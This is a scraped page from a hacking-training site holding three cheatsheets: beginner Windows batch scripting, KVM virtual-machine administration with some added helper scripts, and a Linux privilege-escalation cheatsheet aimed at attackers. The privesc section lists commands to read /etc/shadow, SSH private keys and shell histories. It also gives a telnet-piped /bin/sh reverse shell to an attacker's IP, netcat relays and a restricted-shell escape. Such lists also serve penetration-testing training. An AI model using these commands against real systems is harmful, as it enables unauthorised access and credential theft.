Small Cheat Sheet for hackers on Batch Programming
Author: Unknown | Date: 11/25/2015 | Label: Cheatsheet
To start off there is the @echo off/on
and there is echo
and pause
so here is an example
Quote:
@echo off
echo Hello This is a test
pause
type this in notepad and save as test.bat
launch it
it will look like this
Quote:
Hello This is a test
Press any key to continue...
Again open notepad and write:
Quote:
@echo on
echo Hello This is a test
pause
and save it on the desktop as test2.bat
launch it, it will look like this
Quote:
C:\Documents and Settings\User\Desktop>echo Hello This is a test
Hello This is a test
C:\Documents and Settings\User\Desktop>pause
Press any key to continue
So for the explanation
@echo off/on:
if you put @echo on it will show the directory as you just saw
if you put @echo off it will just show the words with no directories
so it's best to use @echo off
echo:
If you want to print a simple phrase just type echo followed by the text, in this case echo Hello This is a test
which will show Hello This is a test
pause
pause will pause the batch file; if you press a key the batch will continue. In this case it will exit because there is nothing more left
so try this
Quote:
@echo off
echo Hello This is a test
pause
echo I am testing pause
pause
This will show
Quote:
Hello This is a test
Press Any Key To Continue...
(when you press a key it will show)
I am testing pause
Press Any key to continue..
so that covers the pause command
Now some more commands
there is msg *
and there is cls
open notepad and write:
Quote:
@echo off
echo Hello This is a test
pause
cls
echo I am testing pause
msg * The End
pause
and save as test3.bat
This will show
Quote:
Hello This is a test
Press Any Key To Continue...
(when you press a key it will show)
cls
(the page will clear)
I am testing pause
(a pop-up will show saying The End)
Press Any key to continue..
So .. cls will just clear the screen
and msg * will bring up a pop-up:D
other commands are REM and goto and start
so create a folder name it Test
put any picture inside and name it testpic
open notepad and type
Quote:
@echo off
echo Testing start and rem
rem title Test
start testpic.jpg (or any other extension)
pause
and save it inside the new folder as test4.bat
launch it , it will show:
Quote:
Testing start and rem
Press Any Key To Continue
(and the picture will launch)
so start will launch any file
and rem is a remark, which won't show when the bat file is running
now the goto and set and if
type this inside notepad
Quote:
@echo off
echo This is a test
echo If you want to do math type 1 and press enter
echo If you want to see a picture type 2 and press enter
set /p option=
if '%option%'=='1' goto :math
if '%option%'=='2' start testpic.jpg (or any extension)
:math
echo 2+2
pause
and save it inside the new folder
this will show
Quote:
This is a test
If you want to do math type 1 and press enter
if you want to see a picture type 2 and press enter
(here you can type 1 or 2 and press enter)
(if you press 2 and Enter the picture will load)
(if you press 1 and enter this will show up):
2+2
Press any key to continue...
so goto will go to a label, a part of the file
when you put :math
a new label named math is created, and when you put goto :math
the batch will go to :math
set
the set command will set a variable :D.. here set /p sets "option" from what you type
the set is, in some cases, followed by if
so if I type 1 in this example
the "option" will be 1 .. and it will go to :math because we put
if '%option%'=='1' goto :math
so if we put 1 the option will be 1, therefore it will goto :math
now I am going to talk about call, exit, and SHIFT
go into notepad and type this
Quote:
@echo off
echo yay me i know the basics of batch
call call.bat
pause
exit
and save in a new folder:)
then open note pad and type this again
Quote:
@echo off
echo I Love hacking
pause
and save it in the same folder that you saved the last one in... and name it call.bat
launch the first one
this will show
Quote:
yay me i know the basics of batch
I Love hacking
Press Any Key To Continue....
(when you press a key the below will appear)
Press Any Key To Continue...
and when you press a key it will exit
ok.. so now you know what exit does.. it exits the file lmao
and call calls another batch file!!..
so now for SHIFT, which is a little hard, so try to understand
SHIFT [/n]
If Command Extensions are enabled, the SHIFT command supports the /n switch, which tells the command to start shifting at the nth argument, where n can be between zero and eight.
just like this one below
SHIFT /2
would shift %3 to %2, %4 to %3, etc. and leave %0 and %1 unaffected.
Examples
the below has to be saved as .bat.. so just name it test.bat :)
@ECHO OFF
ECHO - %1
SHIFT
ECHO - %1
After creating the above example test.bat file, if you were to type the below command at the MS-DOS prompt, it would print "- ONE" and then "- TWO"; this command is commonly used to work through each of the command extensions or remove command extensions.
(SHIFT , i mean the explanation... i got it from a website and edited it)
Ok I hope you understand
ok that's it for now.. I'll post Batch Features later
Hello... please read the 2 tutorials before; in this one I will talk about a lot of features, here we go!:D..
first we will learn how to launch windows applications:
type in notepad:
Quote:
@echo off
echo I am testing notepad!
start /MIN notepad
pause
This will show
Quote:
i am testing notepad
(and notepad will start minimized.. if you put /MAX instead of /MIN it will launch maximized)
Press Any Key To Continue
Now let's learn how to put a timeout inside a batch..
goto notepad and type:
Quote:
@echo off
echo i am trying timeout
set wait=0
:pause1
set /a wait=%wait%+1
if %wait% leq 1000 goto pause1
echo IT WORKED!
pause
dont understand the command.. just copy paste it.. or memorize it .. if i tell you the explanation it will take years!!..
so this will show :
Quote:
i am trying timeout
(couple of seconds and.. )
IT WORKED!
Press Any Key To Continue...
Now I'll teach you how to change the TIME
goto notepad and type:
Quote:
@echo off
echo Gee!.. i wonder what time it is!!
TIME 5:50
echo Oh so its 5:50
pause
this will show:
Quote:
Gee!.. i wonder what time it is!!
Oh so its 5:50
TIME will just change the system time :P lmao
Now the Color
go into notepad and type this
Quote:
@echo off
echo trying the colors
pause
color 04
echo testing
pause
color f
echo trying
pause
color 4f
echo trying
pause
04 = background black and font red
f = the font will be white
4f = background red and font white
Here is the list (it can be found with color /? in cmd)
0=black
1=blue
2=green
3=aqua
4=red
5=purple
6=yellow
7=white
8=gray
9=light blue
a=light green
b=light aqua
c=light red
d=light purple
e=light yellow
f=bright white
So this will show... lmao
I won't tell, try it!!.:P
now the title
type this in notepad
Quote:
@echo off
title Test
echo trying the title
pause
this will show the title Test when you launch it!!
let's try Shutdown/Restart
type this in Notepad
Quote:
@echo off
START C:\Windows\RUNDLL.EXE user.exe,exitwindowsexec
exit
The above will restart
Quote:
@echo off
rem Shut down the computer
C:\Windows\RUNDLL32.EXE user,exitwindows
exit
The Above will Shutdown
Enjoy!!!
www.extremehacking.org
CEHv9 CHFI ECSAv9 CAST ENSA CCNA CCNA SECURITY MCITP RHCE CHECKPOINT ASA FIREWALL VMWARE CLOUD ANDROID IPHONE NETWORKING HARDWARE TRAINING INSTITUTE IN PUNE, Certified Ethical Hacking, Center For Advanced Security Training in India, IT Security Training Information Security Traning Courses in Pune, ceh certification in pune, Ethical Hacking Course in Pune
Virtual Machine Adding Memory Cheatsheet
Author: Unknown | Date: 11/09/2015 | Label: Cheatsheet
Extreme Hacking | Sadik Shaikh
Ethical Hacking Institute Course in Pune-India
This tutorial will explain how to perform the following Linux KVM VM activities:
Add Memory to VM
Add vCPU to VM
Add Disk to VM
Save VM Configuration
Delete a VM
1. Add Memory to Virtual Machine
To add additional memory to your VM, you should do the following:
Shutdown your VM
Edit the VM file and increase the value of maximum memory allocated to this VM
Restart the VM
Use virsh setmem to set the memory upto the maximum memory allocated for this VM.
In this example, let us increase the memory of the myRHELVM1 VM from 2GB to 4GB.
First, shutdown the VM using virsh shutdown as shown below:
# virsh shutdown myRHELVM1
Domain myRHELVM1 is being shutdown
Next, edit the VM using virsh edit:
# virsh edit myRHELVM1
Look for the line below and change the memory value as follows. In my example, earlier it was 2097152:
<memory unit='KiB'>4194304</memory>
Please note that the above value is in KiB. After making the change, save and exit; virsh confirms the edit:
Domain myRHELVM1 XML configuration edited.
Restart the VM with the updated configuration file. Now you will see the max memory increased from 2G to 4G, and you can dynamically modify the VM memory up to the 4G max limit.
Create the domain from the XML file using virsh create:
# virsh create /etc/libvirt/qemu/myRHELVM1.xml
Domain myRHELVM1 created from /etc/libvirt/qemu/myRHELVM1.xml
View the available Memory for this domain. As you see below, even though the maximum available memory is 4GB, this domain only has 2GB (Used memory).
# virsh dominfo myRHELVM1 | grep memory
Max memory: 4194304 KiB
Used memory: 2097152 KiB
Set the memory for this domain to 4GB using virsh setmem as shown below:
# virsh setmem myRHELVM1 4194304
Now, the following indicates that we’ve allocated 4GB (Used memory) to this domain.
# virsh dominfo myRHELVM1 | grep memory
Max memory: 4194304 KiB
Used memory: 4194304 KiB
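Since virsh setmem only works up to the Max memory shown by dominfo, the following added example (not part of the original tutorial) parses a constructed copy of that output and validates a requested size before the setmem call. The function names (gib_to_kib, max_memory_kib, used_memory_kib, plan_setmem) are my own; on a real host the text would come from `virsh dominfo "$DOMAIN"`.

```shell
#!/bin/sh
# Added example: validate a virsh setmem request against the domain's
# "Max memory" before applying it. SAMPLE_DOMINFO is constructed to match
# the dominfo output shown in the tutorial (after the XML edit and restart).
SAMPLE_DOMINFO='Id:             3
Name:           myRHELVM1
UUID:           00000000-0000-0000-0000-000000000000
OS Type:        hvm
State:          running
CPU(s):         2
CPU time:       21.0s
Max memory:     4194304 KiB
Used memory:    2097152 KiB'

# Convert GiB to KiB, the unit both virsh setmem and the <memory> element use.
gib_to_kib() {
    echo $(( $1 * 1024 * 1024 ))
}

# Extract the "Max memory" value (KiB) from dominfo text given on stdin.
max_memory_kib() {
    awk -F': *' '$1 == "Max memory" { split($2, a, " "); print a[1] }'
}

# Extract the "Used memory" value (KiB) from dominfo text given on stdin.
used_memory_kib() {
    awk -F': *' '$1 == "Used memory" { split($2, a, " "); print a[1] }'
}

# Decide whether setting the domain described by $1 to $2 GiB is allowed.
# Prints the KiB value to hand to setmem and returns 0, or returns 1 when the
# request exceeds Max memory (that case needs the virsh edit + restart steps).
plan_setmem() {
    dominfo="$1"; want_gib="$2"
    max=$(printf '%s\n' "$dominfo" | max_memory_kib)
    want=$(gib_to_kib "$want_gib")
    if [ "$want" -gt "$max" ]; then
        echo "requested ${want} KiB exceeds Max memory ${max} KiB; raise <memory> first" >&2
        return 1
    fi
    echo "$want"
}

# Usage against the constructed sample; the real call would be
# `virsh setmem myRHELVM1 "$kib"` once plan_setmem succeeds.
if kib=$(plan_setmem "$SAMPLE_DOMINFO" 4); then
    echo "virsh setmem myRHELVM1 $kib"
fi
```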
2. Add VCPU to VM
To increase the number of virtual CPUs allocated to the VM, do virsh edit and change the vcpu parameter as explained below.
In this example, let us increase the vCPU count of the myRHELVM1 VM from 2 to 4.
First, shutdown the VM using virsh shutdown as shown below:
# virsh shutdown myRHELVM1
Domain myRHELVM1 is being shutdown
Next, edit the VM using virsh edit:
# virsh edit myRHELVM1
Look for the line below and change the vcpu value as follows. In my example, earlier it was 2.
<vcpu placement='static'>4</vcpu>
Create the domain from the XML file using virsh create:
# virsh create /etc/libvirt/qemu/myRHELVM1.xml
Domain myRHELVM1 created from /etc/libvirt/qemu/myRHELVM1.xml
View the virtual CPUs allocated to this domain as shown below. This indicates that we’ve increased the vCPU from 2 to 4.
# virsh dominfo myRHELVM1 | grep -i cpu
CPU(s): 4
CPU time: 21.0s
3. Add Disk to VM
In this example, we have only one virtual disk (/dev/vda) with two partitions (vda1 and vda2) on this VM.
# fdisk -l | grep vd
Disk /dev/vda: 10.7 GB, 10737418240 bytes
/dev/vda1 * 3 1018 512000 83 Linux
/dev/vda2 1018 20806 9972736 8e Linux LVM
There are two steps involved in creating and attaching a new storage device to Linux KVM guest VM:
First, create a virtual disk image
Attach the virtual disk image to the VM
Let us create one more virtual disk and attach it to our VM. For this, we first need to create a disk image file using qemu-img create command as shown below.
In the following example, we are creating a virtual disk image with 7GB of size. The disk images are typically located under /var/lib/libvirt/images/ directory.
# cd /var/lib/libvirt/images/
# qemu-img create -f raw myRHELVM1-disk2.img 7G
Formatting 'myRHELVM1-disk2.img', fmt=raw size=7516192768
To attach the newly created disk image, use the virsh attach-disk command as shown below:
# virsh attach-disk myRHELVM1 --source /var/lib/libvirt/images/myRHELVM1-disk2.img --target vdb --persistent
Disk attached successfully
The above virsh attach-disk command has the following parameters:
myRHELVM1 - the name of the VM
--source - the full path of the source disk image. This is the one that we created using the qemu-img command above, i.e. myRHELVM1-disk2.img
--target - the device name inside the guest. In this example, we want to attach the given disk image as /dev/vdb. Please note that we don't really need to specify /dev; it is enough to specify vdb.
--persistent - indicates that the attachment is written to the domain configuration, so the disk stays attached across restarts.
As you see below, the new /dev/vdb is now available on the VM.
# fdisk -l | grep vd
Disk /dev/vda: 10.7 GB, 10737418240 bytes
/dev/vda1 * 3 1018 512000 83 Linux
/dev/vda2 1018 20806 9972736 8e Linux LVM
Disk /dev/vdb: 7516 MB, 7516192768 bytes
Now, you can partition the /dev/vdb device, create multiple partitions /dev/vdb1, /dev/vdb2, etc., and mount them in the VM. Use fdisk to create the partitions as explained earlier.
Similarly, to detach a disk from the guest VM, use the command below. But be careful to specify the correct vd*, otherwise you may end up removing the wrong device.
# virsh detach-disk myRHELVM1 vdb
Disk detached successfully
4. Save Virtual Machine Configuration
If you make a lot of changes to your VM, it is recommended that you save the configuration.
Use the virsh dumpxml command to take a backup of your VM's configuration as shown below.
# virsh dumpxml myRHELVM1 > myrhelvm1.xml
# ls myrhelvm1.xml
myrhelvm1.xml
Once you have the configuration file in the XML format, you can always recreate your guest VM from this XML file, using virsh create command as shown below:
# virsh create myrhelvm1.xml
5. Delete KVM Virtual Machine
If you've created multiple VMs for testing purposes and would like to delete them, you should do the following three steps:
Shutdown the VM
Destroy the VM (and undefine it)
Remove the Disk Image File
In this example, let us delete myRHELVM2 VM. First, shutdown this VM:
# virsh shutdown myRHELVM2
Domain myRHELVM2 is being shutdown
Next, destroy this VM as shown below:
# virsh destroy myRHELVM2
Domain myRHELVM2 destroyed
Apart from destroying it, you should also undefine the VM as shown below:
# virsh undefine myRHELVM2
Domain myRHELVM2 has been undefined
Finally, remove any disk image files that you've created for this VM from the /var/lib/libvirt/images directory:
# rm /var/lib/libvirt/images/myRHELVM2-disk1.img
# rm /var/lib/libvirt/images/myRHELVM2-disk2.img
Linux privilege escalation cheatsheet
Author: Unknown | Date: 11/08/2015 | Label: Cheatsheet
Enumeration is the key.
(Linux) privilege escalation is all about:
Collect - Enumeration, more enumeration and some more enumeration.
Process - Sort through the data, analyse and prioritise.
Search - Know what to search for and where to find the exploit code.
Adapt - Customize the exploit so it fits. Not every exploit works for every system "out of the box".
Try - Get ready for (lots of) trial and error.
Operating System
What's the distribution type? What version?
cat /etc/issue
cat /etc/*-release
cat /etc/lsb-release
cat /etc/redhat-release
What's the Kernel version? Is it 64-bit?
cat /proc/version
uname -a
uname -mrs
rpm -q kernel
dmesg | grep Linux
ls /boot | grep vmlinuz-
What can be learnt from the environment variables?
cat /etc/profile
cat /etc/bashrc
cat ~/.bash_profile
cat ~/.bashrc
cat ~/.bash_logout
env
set
Is there a printer?
lpstat -a
Applications & Services
What services are running? Which service has which user privilege?
ps aux
ps -ef
top
cat /etc/services
Which service(s) are being run by root? Of these services, which are vulnerable? It's worth a double check!
ps aux | grep root
ps -ef | grep root
What applications are installed? What version are they? Are they currently running?
ls -alh /usr/bin/
ls -alh /sbin/
dpkg -l
rpm -qa
ls -alh /var/cache/apt/archives
ls -alh /var/cache/yum/
Any of the service(s) settings misconfigured? Are any (vulnerable) plugins attached?
cat /etc/syslog.conf
cat /etc/chttp.conf
cat /etc/lighttpd.conf
cat /etc/cups/cupsd.conf
cat /etc/inetd.conf
cat /etc/apache2/apache2.conf
cat /etc/my.conf
cat /etc/httpd/conf/httpd.conf
cat /opt/lampp/etc/httpd.conf
ls -aRl /etc/ | awk '$1 ~ /^.*r.*/' 2>/dev/null
What jobs are scheduled?
crontab -l
ls -alh /var/spool/cron
ls -al /etc/ | grep cron
ls -al /etc/cron*
cat /etc/cron*
cat /etc/at.allow
cat /etc/at.deny
cat /etc/cron.allow
cat /etc/cron.deny
cat /etc/crontab
cat /etc/anacrontab
cat /var/spool/cron/crontabs/root
Any plain text usernames and/or passwords?
grep -i user [filename]
grep -i pass [filename]
grep -C 5 "password" [filename]
find . -name "*.php" -print0 | xargs -0 grep -i -n "var $password" # Joomla
Communications & Networking
What NIC(s) does the system have? Is it connected to another network?
/sbin/ifconfig -a
cat /etc/network/interfaces
cat /etc/sysconfig/network
What are the network configuration settings? What can you find out about this network? DHCP server? DNS server? Gateway?
cat /etc/resolv.conf
cat /etc/sysconfig/network
cat /etc/networks
iptables -L
hostname
dnsdomainname
What other users & hosts are communicating with the system?
lsof -i
lsof -i :80
grep 80 /etc/services
netstat -antup
netstat -antpx
netstat -tulpn
chkconfig --list
chkconfig --list | grep 3:on
last
w
What's cached? IP and/or MAC addresses
arp -e
route
/sbin/route -nee
Is packet sniffing possible? What can be seen? Listen to live traffic
# tcpdump tcp dst [ip] [port] and tcp dst [ip] [port]
tcpdump tcp dst 192.168.1.7 80 and tcp dst 10.2.2.222 21
Have you got a shell? Can you interact with the system?
nc -lvp 4444 # Attacker. Input (Commands)
nc -lvp 4445 # Attacker. Output (Results)
telnet [attackers ip] 44444 | /bin/sh | [local ip] 44445 # On the target system. Use the attacker's IP!
Is port forwarding possible? Redirect and interact with traffic from another view
# rinetd
# fpipe
# FPipe.exe -l [local port] -r [remote port] -s [local port] [local IP]
FPipe.exe -l 80 -r 80 -s 80 192.168.1.7
# ssh -[L/R] [local port]:[remote ip]:[remote port] [local user]@[local ip]
ssh -L 8080:127.0.0.1:80 root@192.168.1.7 # Local Port
ssh -R 8080:127.0.0.1:80 root@192.168.1.7 # Remote Port
# mknod backpipe p ; nc -l -p [remote port] < backpipe | nc [local IP] [local port] >backpipe
mknod backpipe p ; nc -l -p 8080 < backpipe | nc 10.1.1.251 80 >backpipe # Port Relay
mknod backpipe p ; nc -l -p 8080 0<backpipe | tee -a inflow | nc localhost 80 | tee -a outflow 1>backpipe # Proxy (Port 80 to 8080)
mknod backpipe p ; nc -l -p 8080 0<backpipe | tee -a inflow | nc localhost 80 | tee -a outflow & 1>backpipe # Proxy monitor (Port 80 to 8080)
Is tunnelling possible? Send commands locally, remotely
ssh -D 127.0.0.1:9050 -N [username]@[ip]
proxychains ifconfig
Confidential Information & Users
Who are you? Who is logged in? Who has been logged in? Who else is there? Who can do what?
id
who
w
last
cat /etc/passwd | cut -d: -f1 # List of users
grep -v -E "^#" /etc/passwd | awk -F: '$3 == 0 { print $1}' # List of super users
awk -F: '($3 == "0") {print}' /etc/passwd # List of super users
cat /etc/sudoers
sudo -l
What sensitive files can be found?
cat /etc/passwd
cat /etc/group
cat /etc/shadow
ls -alh /var/mail/
Anything "interesting" in the home directory(ies)? If it's possible to access them
ls -ahlR /root/
ls -ahlR /home/
Are there any passwords in; scripts, databases, configuration files or log files? Default paths and locations for passwords
cat /var/apache2/config.inc
cat /var/lib/mysql/mysql/user.MYD
cat /root/anaconda-ks.cfg
What has the user been doing? Is there any password in plain text? What have they been editing?
cat ~/.bash_history
cat ~/.nano_history
cat ~/.atftp_history
cat ~/.mysql_history
cat ~/.php_history
What user information can be found?
cat ~/.bashrc
cat ~/.profile
cat /var/mail/root
cat /var/spool/mail/root
Can private-key information be found?
cat ~/.ssh/authorized_keys
cat ~/.ssh/identity.pub
cat ~/.ssh/identity
cat ~/.ssh/id_rsa.pub
cat ~/.ssh/id_rsa
cat ~/.ssh/id_dsa.pub
cat ~/.ssh/id_dsa
cat /etc/ssh/ssh_config
cat /etc/ssh/sshd_config
cat /etc/ssh/ssh_host_dsa_key.pub
cat /etc/ssh/ssh_host_dsa_key
cat /etc/ssh/ssh_host_rsa_key.pub
cat /etc/ssh/ssh_host_rsa_key
cat /etc/ssh/ssh_host_key.pub
cat /etc/ssh/ssh_host_key
File Systems
Which configuration files can be written in /etc/? Able to reconfigure a service?
ls -aRl /etc/ | awk '$1 ~ /^.*w.*/' 2>/dev/null # Anyone
ls -aRl /etc/ | awk '$1 ~ /^..w/' 2>/dev/null # Owner
ls -aRl /etc/ | awk '$1 ~ /^.....w/' 2>/dev/null # Group
ls -aRl /etc/ | awk '$1 ~ /w.$/' 2>/dev/null # Other
find /etc/ -readable -type f 2>/dev/null # Anyone
find /etc/ -readable -type f -maxdepth 1 2>/dev/null # Anyone
What can be found in /var/ ?
ls -alh /var/log
ls -alh /var/mail
ls -alh /var/spool
ls -alh /var/spool/lpd
ls -alh /var/lib/pgsql
ls -alh /var/lib/mysql
cat /var/lib/dhcp3/dhclient.leases
Any settings/files (hidden) on website? Any settings file with database information?
ls -alhR /var/www/
ls -alhR /srv/www/htdocs/
ls -alhR /usr/local/www/apache22/data/
ls -alhR /opt/lampp/htdocs/
ls -alhR /var/www/html/
Is there anything in the log file(s) (Could help with "Local File Includes"!)
cat /etc/httpd/logs/access_log
cat /etc/httpd/logs/access.log
cat /etc/httpd/logs/error_log
cat /etc/httpd/logs/error.log
cat /var/log/apache2/access_log
cat /var/log/apache2/access.log
cat /var/log/apache2/error_log
cat /var/log/apache2/error.log
cat /var/log/apache/access_log
cat /var/log/apache/access.log
cat /var/log/auth.log
cat /var/log/chttp.log
cat /var/log/cups/error_log
cat /var/log/dpkg.log
cat /var/log/faillog
cat /var/log/httpd/access_log
cat /var/log/httpd/access.log
cat /var/log/httpd/error_log
cat /var/log/httpd/error.log
cat /var/log/lastlog
cat /var/log/lighttpd/access.log
cat /var/log/lighttpd/error.log
cat /var/log/lighttpd/lighttpd.access.log
cat /var/log/lighttpd/lighttpd.error.log
cat /var/log/messages
cat /var/log/secure
cat /var/log/syslog
cat /var/log/wtmp
cat /var/log/xferlog
cat /var/log/yum.log
cat /var/run/utmp
cat /var/webmin/miniserv.log
cat /var/www/logs/access_log
cat /var/www/logs/access.log
ls -alh /var/lib/dhcp3/
ls -alh /var/log/postgresql/
ls -alh /var/log/proftpd/
ls -alh /var/log/samba/
# auth.log, boot, btmp, daemon.log, debug, dmesg, kern.log, mail.info, mail.log, mail.warn, messages, syslog, udev, wtmp
If commands are limited, can you break out of the "jail" shell?
python -c 'import pty;pty.spawn("/bin/bash")'
echo os.system('/bin/bash')
/bin/sh -i
How are file-systems mounted?
mount
df -h
Are there any unmounted file-systems?
cat /etc/fstab
What "Advanced Linux File Permissions" are used? Sticky bits, SUID & GUID
find / -perm -1000 -type d 2>/dev/null # Sticky bit - Only the owner of the directory or the owner of a file can delete or rename here
find / -perm -g=s -type f 2>/dev/null # SGID (chmod 2000) - run as the group, not the user who started it.
find / -perm -u=s -type f 2>/dev/null # SUID (chmod 4000) - run as the owner, not the user who started it.
find / -perm -g=s -o -perm -u=s -type f 2>/dev/null # SGID or SUID
for i in `locate -r "bin$"`; do find $i \( -perm -4000 -o -perm -2000 \) -type f 2>/dev/null; done # Looks in 'common' places: /bin, /sbin, /usr/bin, /usr/sbin, /usr/local/bin, /usr/local/sbin and any other *bin, for SGID or SUID (Quicker search)
# find starting at root (/), SGID or SUID, not Symbolic links, only 3 folders deep, list with more detail and hide any errors (e.g. permission denied)
find / -perm -g=s -o -perm -4000 ! -type l -maxdepth 3 -exec ls -ld {} \; 2>/dev/null
Where can be written to and executed from? A few 'common' places: /tmp, /var/tmp, /dev/shm
find / -writable -type d 2>/dev/null # world-writeable folders
find / -perm -222 -type d 2>/dev/null # world-writeable folders
find / -perm -o+w -type d 2>/dev/null # world-writeable folders
find / -perm -o+x -type d 2>/dev/null # world-executable folders
find / \( -perm -o+w -perm -o+x \) -type d 2>/dev/null # world-writeable & executable folders
Any "problem" files? World-writeable, "nobody" files
find / -xdev -type d \( -perm -0002 -a ! -perm -1000 \) -print # world-writeable directories without the sticky bit
find /dir -xdev \( -nouser -o -nogroup \) -print # files with no owner or no group
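The awk one-liners in the /etc check and the find searches for SUID/SGID/sticky bits above both come down to reading the mode field of a listing. The following added example (not part of the original cheatsheet) does that classification in POSIX sh over a constructed ls -l listing, so it runs offline; the function names mode_flags, audit_listing and audit_sample are my own, and on a host you would pipe in `ls -aRl /etc/ 2>/dev/null` or the ls -ld output of a find.

```shell
#!/bin/sh
# Added example: classify ls -l mode strings into owner/group/other writable
# classes plus SUID/SGID/sticky, then report entries worth a second look.
# SAMPLE_LISTING is constructed; paths and sizes are illustrative only.
SAMPLE_LISTING='-rw-r--r-- 1 root root   1234 Nov  8  2015 /etc/passwd
-rw-rw-r-- 1 root adm    4096 Nov  8  2015 /etc/lighttpd.conf
-rw-rw-rw- 1 root root    512 Nov  8  2015 /etc/cups/cupsd.conf
-rwsr-xr-x 1 root root  40000 Nov  8  2015 /usr/bin/passwd
-rwxr-sr-x 1 root tty   20000 Nov  8  2015 /usr/bin/wall
drwxrwxrwt 2 root root   4096 Nov  8  2015 /tmp
drwxrwxrwx 2 root root   4096 Nov  8  2015 /var/tmp/unsafe'

# Print the classes of one mode string (e.g. -rwsr-xr-x), space-separated.
# Positions: 1 type, 2-4 owner, 5-7 group, 8-10 other. An s/S in an execute
# slot is SUID (owner) or SGID (group); t/T in the last slot is the sticky bit.
mode_flags() {
    mode="$1"; flags=""
    case "$mode" in ??w*) flags="$flags owner-w";; esac
    case "$mode" in ?????w*) flags="$flags group-w";; esac
    case "$mode" in ????????w?) flags="$flags other-w";; esac
    case "$mode" in ???[sS]*) flags="$flags suid";; esac
    case "$mode" in ??????[sS]*) flags="$flags sgid";; esac
    case "$mode" in ?????????[tT]) flags="$flags sticky";; esac
    echo "${flags# }"
}

# Read ls -l lines on stdin (mode links owner group size month day year path)
# and print "path: flags" for entries writable by group or other, or carrying
# SUID/SGID. Entries writable only by their owner are skipped as normal.
audit_listing() {
    while read -r mode _ _ _ _ _ _ _ path; do
        [ -n "$mode" ] || continue
        flags=$(mode_flags "$mode")
        case " $flags " in
            *" group-w "*|*" other-w "*|*" suid "*|*" sgid "*) echo "$path: $flags";;
        esac
    done
}

# Run the audit over the constructed listing.
audit_sample() {
    printf '%s\n' "$SAMPLE_LISTING" | audit_listing
}

audit_sample
```

A world-writable directory that also shows `sticky` (like /tmp) is the expected layout; one without it (like the constructed /var/tmp/unsafe) is the case the find -perm -0002 ! -perm -1000 search above is looking for.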
Preparation & Finding Exploit Code
What development tools/languages are installed/supported?
find / -name perl*
find / -name python*
find / -name gcc*
find / -name cc
How can files be uploaded?
find / -name wget
find / -name nc*
find / -name netcat*
find / -name tftp*
find / -name ftp
More to come, stay tuned.. \m/